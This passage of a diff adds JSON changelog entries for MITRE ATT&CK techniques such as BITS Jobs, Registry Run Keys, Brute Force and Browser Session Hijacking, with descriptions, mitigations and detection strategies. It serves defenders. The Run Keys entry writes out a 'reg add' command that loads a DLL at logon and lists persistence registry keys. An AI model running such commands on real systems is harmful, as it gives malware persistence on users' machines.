+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0397: Automated Exfiltration Detection Strategy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "BITS Jobs",
+                    "description": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)\n\nAdversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1197",
+                            "external_id": "T1197"
+                        },
+                        {
+                            "source_name": "CTU BITS Malware June 2016",
+                            "description": "Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.",
+                            "url": "https://www.secureworks.com/blog/malware-lingers-with-bits"
+                        },
+                        {
+                            "source_name": "Symantec BITS May 2007",
+                            "description": "Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.",
+                            "url": "https://www.symantec.com/connect/blogs/malware-update-windows-update"
+                        },
+                        {
+                            "source_name": "PaloAlto UBoatRAT Nov 2017",
+                            "description": "Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
+                        },
+                        {
+                            "source_name": "Microsoft BITS",
+                            "description": "Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft BITSAdmin",
+                            "description": "Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.",
+                            "url": "https://msdn.microsoft.com/library/aa362813.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft COM",
+                            "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx"
+                        },
+                        {
+                            "source_name": "Mondok Windows PiggyBack BITS May 2007",
+                            "description": "Mondok, M. (2007, May 11). Malware piggybacks on Windows\u2019 Background Intelligent Transfer Service. Retrieved January 12, 2018.",
+                            "url": "https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Brent Murphy, Elastic",
+                        "David French, Elastic",
+                        "Red Canary",
+                        "Ricardo Dias"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2026-04-15 19:57:02.003000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0098: Detect abuse of Windows BITS Jobs for download, execution and persistence"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-23 22:02:48.566000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Registry Run Keys / Startup Folder",
+                    "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup</code>. The startup folder path for all users is <code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run automatically for the currently logged-on user.\n\nBy default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1547/001",
+                            "external_id": "T1547.001"
+                        },
+                        {
+                            "source_name": "Malwarebytes Wow6432Node 2016",
+                            "description": "Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020.",
+                            "url": "https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/"
+                        },
+                        {
+                            "source_name": "Microsoft Wow6432Node 2018",
+                            "description": "Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry"
+                        },
+                        {
+                            "source_name": "Microsoft Run Key",
+                            "description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September 12, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys"
+                        },
+                        {
+                            "source_name": "Oddvar Moe RunOnceEx Mar 2018",
+                            "description": "Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.",
+                            "url": "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/"
+                        },
+                        {
+                            "source_name": "TechNet Autoruns",
+                            "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Oddvar Moe, @oddvarmoe",
+                        "Dray Agha, @Purp1eW0lf, Huntress Labs",
+                        "Harun K\u00fc\u00dfner"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:09.744000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.1",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0365: Detect Registry and Startup Folder Persistence (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:38.910000+00:00",
+                    "modified": "2026-05-12 15:12:00.619000+00:00",
+                    "name": "Boot or Logon Initialization Scripts",
+                    "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1037",
+                            "external_id": "T1037"
+                        },
+                        {
+                            "source_name": "Anomali Rocke March 2019",
+                            "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.",
+                            "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"
+                        },
+                        {
+                            "source_name": "Mandiant APT29 Eye Spy Email Nov 22",
+                            "description": "Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.",
+                            "url": "https://www.mandiant.com/resources/blog/unc3524-eye-spy-email"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.619000+00:00\", \"old_value\": \"2025-10-24 17:48:20.077000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1024: Restrict Registry Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0112: Boot or Logon Initialization Scripts Detection Strategy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Browser Information Discovery",
+                    "description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1217",
+                            "external_id": "T1217"
+                        },
+                        {
+                            "source_name": "Chrome Roaming Profiles",
+                            "description": "Chrome Enterprise and Education Help. (n.d.). Use Chrome Browser with Roaming User Profiles. Retrieved March 28, 2023.",
+                            "url": "https://support.google.com/chrome/a/answer/7349337"
+                        },
+                        {
+                            "source_name": "Kaspersky Autofill",
+                            "description": "Golubev, S. (n.d.). How malware steals autofill data from browsers. Retrieved March 28, 2023.",
+                            "url": "https://www.kaspersky.com/blog/browser-data-theft/27871/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Mike Kemmerer",
+                        "Manikantan Srinivasan, NEC Corporation India",
+                        "Yinon Engelsman, Talon Cyber Security",
+                        "Yonatan Gotlib, Talon Cyber Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2025-10-24 17:48:50.561000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0013: Detection of Local Browser Artifact Access for Reconnaissance"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-01-16 16:13:52.465000+00:00",
+                    "modified": "2026-05-12 15:12:00.633000+00:00",
+                    "name": "Browser Session Hijacking",
+                    "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1185",
+                            "external_id": "T1185"
+                        },
+                        {
+                            "source_name": "ICEBRG Chrome Extensions",
+                            "description": "De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.",
+                            "url": "https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses"
+                        },
+                        {
+                            "source_name": "Cobalt Strike Browser Pivot",
+                            "description": "Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.",
+                            "url": "https://www.cobaltstrike.com/help-browser-pivoting"
+                        },
+                        {
+                            "source_name": "cobaltstrike manual",
+                            "description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.",
+                            "url": "https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf"
+                        },
+                        {
+                            "source_name": "Wikipedia Man in the Browser",
+                            "description": "Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved January 10, 2018.",
+                            "url": "https://en.wikipedia.org/wiki/Man-in-the-browser"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Justin Warner, ICEBRG"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.633000+00:00\", \"old_value\": \"2025-10-24 17:48:48.383000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1018: User Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0507: Detect browser session hijacking via privilege, handle access, and remote thread into browsers"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:22.767000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Brute Force",
+                    "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access. \n\nIf an adversary guesses the correct password but fails to login to a compromised account due to location-based conditional access policies, they may change their infrastructure until they match the victim\u2019s location and therefore bypass those policies.(Citation: ReliaQuest Health Care Social Engineering Campaign 2024)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1110",
+                            "external_id": "T1110"
+                        },
+                        {
+                            "source_name": "TrendMicro Pawn Storm Dec 2020",
+                            "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm\u2019s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.",
+                            "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html"
+                        },
+                        {
+                            "source_name": "ReliaQuest Health Care Social Engineering Campaign 2024",
+                            "description": "Hayden Evans. (2024, April 4). Health Care Social Engineering Campaign. Retrieved May 22, 2025.",
+                            "url": "https://www.reliaquest.com/blog/health-care-social-engineering-campaign/"
+                        },
+                        {
+                            "source_name": "Dragos Crashoverride 2018",
+                            "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.",
+                            "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "David Fiser, @anu4is, Trend Micro",
+                        "Alfredo Oliveira, Trend Micro",
+                        "Magno Logan, @magnologan, Trend Micro",
+                        "Yossi Weizman, Azure Defender Research Team",
+                        "Ed Williams, Trustwave, SpiderLabs",
+                        "Mohamed Kmal",
+                        "ReliaQuest"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.8",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:12.218000+00:00\"}}}",
+                    "previous_version": "2.8",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication",
+                            "M1036: Account Use Policies"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0463: Brute Force Authentication Failures with Multi-Platform Log Correlation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:39:59.959000+00:00",
+                    "modified": "2026-05-12 15:12:00.708000+00:00",
+                    "name": "Credential Stuffing",
